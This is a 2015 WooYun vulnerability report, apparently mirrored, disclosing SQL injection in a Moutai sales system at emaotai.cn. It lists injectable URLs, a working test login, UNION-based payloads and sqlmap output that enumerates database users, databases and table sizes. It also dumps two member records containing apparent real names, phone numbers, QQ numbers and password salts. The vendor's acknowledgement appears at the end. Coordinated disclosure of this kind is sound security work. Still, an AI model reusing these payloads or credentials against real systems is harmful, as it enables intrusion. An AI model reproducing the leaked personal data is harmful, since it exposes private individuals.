乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-19: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
http://www.emaotai.cn:90/zyd/
账号:wanglei密码:123456get提交方式sql注入点:
http://www.emaotai.cn:90/zyd/Sales/XsdEdit.aspx?pjbh=111000100020&ReturnPage=Xsmxz.aspx&op=2
http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650
http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18
post提交注入点(在搜索框中输入单引号即可发现):
类似的问题还很多,自查吧
以
为例
Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----[09:33:34] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[09:33:34] [INFO] fetching database users[09:33:35] [INFO] the SQL query used returns 12 entries[09:33:35] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##[09:33:35] [INFO] retrieved: ##MS_PolicyTsqlExecutionLogin##[09:33:36] [INFO] retrieved: actuser[09:33:36] [INFO] retrieved: bmDev[09:33:36] [INFO] retrieved: dev[09:33:36] [INFO] retrieved: distributor_admin[09:33:37] [INFO] retrieved: hishop_pj[09:33:37] [INFO] retrieved: hishop_pj[09:33:37] [INFO] retrieved: moutaiwssc[09:33:38] [INFO] retrieved: mysys[09:33:38] [INFO] retrieved: sa[09:33:38] [INFO] retrieved: taxreaderdatabase management system users [11]:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] actuser[*] bmDev[*] dev[*] distributor_admin[*] hishop_pj[*] moutaiwssc[*] mysys[*] sa[*] taxreader
Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----[09:31:54] [INFO] testing Microsoft SQL Server[09:31:54] [INFO] confirming Microsoft SQL Server[09:31:55] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[09:31:55] [INFO] fetching database names[09:31:55] [INFO] the SQL query used returns 18 entries[09:31:56] [INFO] retrieved: distribution[09:31:56] [INFO] retrieved: DrpEco[09:31:56] [INFO] retrieved: drpecosdl[09:31:56] [INFO] retrieved: DrpEcoTest[09:31:57] [INFO] retrieved: eAct[09:31:57] [INFO] retrieved: eActTest[09:31:57] [INFO] retrieved: emaotai_act_test[09:31:58] [INFO] retrieved: emaotai_act_test[09:31:58] [INFO] retrieved: emaotai_logs[09:31:58] [INFO] retrieved: hishop[09:31:59] [INFO] retrieved: master[09:31:59] [INFO] retrieved: model[09:31:59] [INFO] retrieved: moutai[09:31:59] [INFO] retrieved: moutaitest[09:32:00] [INFO] retrieved: msdb[09:32:00] [INFO] retrieved: ReportServer[09:32:00] [INFO] retrieved: ReportServerTempDB[09:32:01] [INFO] retrieved: tempdbavailable databases [17]:[*] distribution[*] DrpEco[*] drpecosdl[*] DrpEcoTest[*] eAct[*] eActTest[*] emaotai_act_test[*] emaotai_logs[*] hishop[*] master[*] model[*] moutai[*] moutaitest[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
Database: hishop+------------------------------------+---------+| Table | Entries |+------------------------------------+---------+| dbo.Hishop_CouponItems | 2473863 || dbo.vw_Hishop_CouponInfo | 2473863 || dbo.aspnet_Members | 476302 || dbo.vw_aspnet_Members | 476299 || dbo.Hishop_MessageContent | 104862 || dbo.Hishop_MemberMessageBox | 104674 || dbo.vw_Hishop_MemberMessageBox | 104670 || dbo.aspnet_UsersInRoles | 82703 || dbo.aspnet_UsersInRoles | 82703 || dbo.Hishop_OrderItems | 38235 || dbo.vw_Hishop_SaleDetails | 38227 || dbo.vw_Hishop_OrderItem | 20446 || dbo.Hishop_OrderOptions | 18255 || dbo.Hishop_ManagerMessageBox | 14698 || dbo.vw_Hishop_ManagerMessageBox | 14695 || dbo.Hishop_PointDetails | 14127 || dbo.xupiaoOrder | 12710 || dbo.Hishop_UserShippingAddresses | 12014 || dbo.Hishop_Logs | 10193 || dbo.Hishop_OrderDebitNote | 8515 || dbo.vw_Hishop_OrderDebitNote | 8509 || dbo.Hishop_SMSLog | 7484 || dbo.Hishop_BookingOrderSend | 4447 || dbo.Hishop_PhotoGallery | 3791 || dbo.Hishop_Favorite | 2395 || dbo.Hishop_ProductConsultations | 1414 || dbo.vw_Hishop_ProductConsultations | 1414 || dbo.t_sys_Columdef | 1261 || dbo.Hishop_ProductReviews | 1127 || dbo.vw_Hishop_ProductReviews | 1127 || dbo.HiShop_PayMentDetail | 656 || dbo.Hishop_PrivilegeInRoles | 541 || dbo.Hishop_SKUMemberPrice | 412 || dbo.Hishop_Products | 375 || dbo.Hishop_SKUs | 375 || dbo.vw_Hishop_BrowseProductList | 375 || dbo.vw_Hishop_ProductSkuList | 375 || dbo.Hishop_OrderRefund | 371 || dbo.vw_Hishop_OrderRefund | 371 || dbo.Hishop_ProductTag | 354 || dbo.Vshop_RelatedTopicProducts | 202 || dbo.Hishop_InpourRequest | 198 || dbo.t_sys_tabledef | 191 || dbo.Hishop_BalanceDetails | 175 || dbo.Hishop_LeaveCommentReplys | 131 || dbo.Hishop_LeaveComments | 127 || dbo.t_cx_sql | 114 || dbo.Hishop_ShoppingCarts | 88 || dbo.t_sys_StoreProc | 87 || dbo.aspnet_Managers | 80 || dbo.Vshop_HomeProducts | 69 || dbo.vw_aspnet_Managers | 69 || dbo.Hishop_Articles | 65 || dbo.vw_Hishop_Articles | 65 || dbo.Hishop_OrderReturns | 56 || dbo.vw_Hishop_OrderReturns | 56 || dbo.vshop_Reply | 47 || dbo.Hishop_PromotionMemberGrades | 40 || dbo.Hishop_ProductTypeBrands | 38 || dbo.Hishop_VoteItems | 38 || dbo.tmp_orders | 38 || dbo.Vshop_Topics | 32 || dbo.Hishop_Affiche | 28 || dbo.Hishop_Categories | 28 || dbo.Hishop_Hotkeywords | 28 || dbo.Hishop_Helps | 26 || dbo.Hishop_OrderReplace | 26 || dbo.vw_Hishop_Helps | 26 || dbo.vw_Hishop_OrderReplace | 26 || dbo.Hishop_PhotoCategories | 23 || dbo.Hishop_BundlingProductItems | 21 || dbo.Hishop_OrderSendNote | 20 || dbo.Hishop_OrderSendNote | 20 || dbo.vw_Hishop_OrderSendNote | 20 || dbo.Hishop_CountDown | 19 || dbo.vw_Hishop_CountDown | 19 || dbo.vshop_Menu | 18 || dbo.Hishop_BrandCategories | 17 || dbo.Hishop_CouponsLog | 14 || dbo.Hishop_CouponsLog | 14 || dbo.Hishop_MessageTemplates | 13 || dbo.Hishop_Tags | 13 || dbo.Hishop_ExpressTemplates | 11 || dbo.Hishop_RelatedProducts | 11 || dbo.aspnet_Roles | 10 || dbo.Hishop_Promotions | 10 || dbo.Hishop_BundlingProducts | 9 || dbo.vshop_Message | 9 || dbo.Vshop_PrizeRecord | 9 || dbo.vw_Hishop_BundlingProducts | 9 || dbo.Hishop_Votes | 8 || dbo.Hishop_Banner | 7 || dbo.Hishop_ActivityProduct | 6 || dbo.Hishop_AttributeValues | 6 || dbo.Hishop_FriendlyLinks | 6 || dbo.Hishop_HelpCategories | 6 || dbo.vshop_ActivitySignUp | 6 || dbo.Hishop_ActivityManage | 5 || dbo.Hishop_ArticleCategories | 5 || dbo.Hishop_ProductTypes | 5 || dbo.aspnet_MemberGrades | 4 || dbo.Hishop_PaymentTypes | 4 || dbo.Hishop_TemplateRelatedShipping | 4 || dbo.Hishop_MemberClientSet | 3 || dbo.Hishop_RelatedArticsProducts | 3 || dbo.CustomMade_WebPoints | 2 || dbo.Hishop_Attributes | 2 || dbo.Hishop_OrderLookupItems | 2 || dbo.Hishop_ShippingTypes | 2 || dbo.Hishop_GroupBuyCondition | 1 || dbo.Hishop_GroupBuyCondition | 1 || dbo.Hishop_MessageWhiteList | 1 || dbo.Hishop_OrderLookupLists | 1 || dbo.Hishop_ProductBooking | 1 || dbo.Hishop_Shippers | 1 || dbo.Hishop_ShippingTemplates | 1 || dbo.Hishop_TableLock | 1 || dbo.t_sys_project | 1 || dbo.vw_Hishop_GroupBuy | 1 |+------------------------------------+---------+
aspnet_Members是会员表,有476302条数据,这里就只查前面2条数据吧
Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----[09:55:19] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[09:55:19] [INFO] fetching columns for table 'aspnet_Members' in database 'hishop'[09:55:19] [INFO] the SQL query used returns 31 entries[09:55:19] [INFO] fetching entries for table 'aspnet_Members' in database 'hishop'[09:55:19] [INFO] fetching number of distinct values for column 'QQ'[09:55:19] [INFO] fetching number of distinct values for column 'MSN'[09:55:19] [INFO] fetching number of distinct values for column 'OpenId'[09:55:19] [INFO] fetching number of distinct values for column 'Points'[09:55:19] [INFO] fetching number of distinct values for column 'typeid'[09:55:19] [INFO] fetching number of distinct values for column 'Address'[09:55:19] [INFO] fetching number of distinct values for column 'Balance'[09:55:19] [INFO] fetching number of distinct values for column 'GradeId'[09:55:19] [INFO] fetching number of distinct values for column 'Zipcode'[09:55:19] [INFO] fetching number of distinct values for column 'CountBuy'[09:55:19] [INFO] fetching number of distinct values for column 'RealName'[09:55:19] [INFO] fetching number of distinct values for column 'RegionId'[09:55:19] [INFO] fetching number of distinct values for column 'TelPhone'[09:55:19] [INFO] fetching number of distinct values for column 'Wangwang'[09:55:19] [INFO] fetching number of distinct values for column 'CellPhone'[09:55:19] [INFO] fetching number of distinct values for column 'SessionId'[09:55:19] [INFO] fetching number of distinct values for column 'UserId_Drp'[09:55:19] [INFO] fetching number of distinct values for column 'Expenditure'[09:55:19] [INFO] fetching number of distinct values for column 'OrderNumber'[09:55:19] [INFO] fetching number of distinct values for column 'TopRegionId'[09:55:19] [INFO] fetching number of distinct values for column 'VipCardDate'[09:55:19] [INFO] fetching number of distinct values for column 'IsOpenBalance'[09:55:19] [INFO] fetching number of distinct values for column 'VipCardNumber'[09:55:19] [INFO] fetching number of distinct values for column 'ReferralUserId'[09:55:19] [INFO] fetching number of distinct values for column 'RequestBalance'[09:55:19] [INFO] fetching number of distinct values for column 'SessionEndTime'[09:55:19] [INFO] fetching number of distinct values for column 'RecordStatus_Drp'[09:55:19] [INFO] fetching number of distinct values for column 'TradePasswordSalt'[09:55:19] [INFO] fetching number of distinct values for column 'TradePasswordFormat'[09:55:19] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows[09:55:20] [INFO] analyzing table dump for possible password hashesDatabase: hishopTable: aspnet_Members[2 entries]+--------+--------+---------+----------+-----------+----------------+-------------+----------------+----------------------+---------+--------+---------+---------+---------+----------+----------+----------+----------+-------------+--------------------+-------------+-------------+---------------+---------------+----------------+----------------+------------------+--------------------------+---------------------+| typeid | OpenId | GradeId | RegionId | SessionId | UserId_Drp | TopRegionId | ReferralUserId | QQ | MSN | Points | Zipcode | Address | Balance | Wangwang | CountBuy | RealName | TelPhone | CellPhone | VipCardDate | OrderNumber | Expenditure | VipCardNumber | IsOpenBalance | SessionEndTime | RequestBalance | RecordStatus_Drp | TradePasswordSalt | TradePasswordFormat |+--------+--------+---------+----------+-----------+----------------+-------------+----------------+----------------------+---------+--------+---------+---------+---------+----------+----------+----------+----------+-------------+--------------------+-------------+-------------+---------------+---------------+----------------+----------------+------------------+--------------------------+---------------------+| 1 | NULL | 1 | 897 | NULL | 20141012000065 | 883 | NULL | 928095509 | <blank> | 0 | NULL | <blank> | 0.00 | NULL | NULL | 杨之光 | NULL | 13103529668 | 10 122014 4:23PM | 0 | 0.00 | NULL | 1 | NULL | 0.00 | 3 | CRJAUboLeduKT+mKpKLZxg== | 1 || 1 | NULL | 1 | 3139 | NULL | 20141022000012 | 3130 | NULL | 233629822 | <blank> | 0 | NULL | <blank> | 0.00 | NULL | NULL | luoping | NULL | 13980951791 | 10 22 2014 11:46AM | 0 | 0.00 | NULL | 0 | NULL | 0.00 | 2 | F0Uuaf1ciAx6tjPaLJITwQ== | 1 |+--------+--------+---------+----------+-----------+----------------+-------------+----------------+----------------------+---------+--------+---------+---------+---------+----------+----------+----------+----------+-------------+--------------------+-------------+-------------+---------------+---------------+----------------+----------------+------------------+--------------------------+---------------------+
你们比我更专业
危害等级:中
漏洞Rank:8
确认时间:2015-11-24 15:09
感谢您的反馈,我们将尽快处理这个Bug。
暂无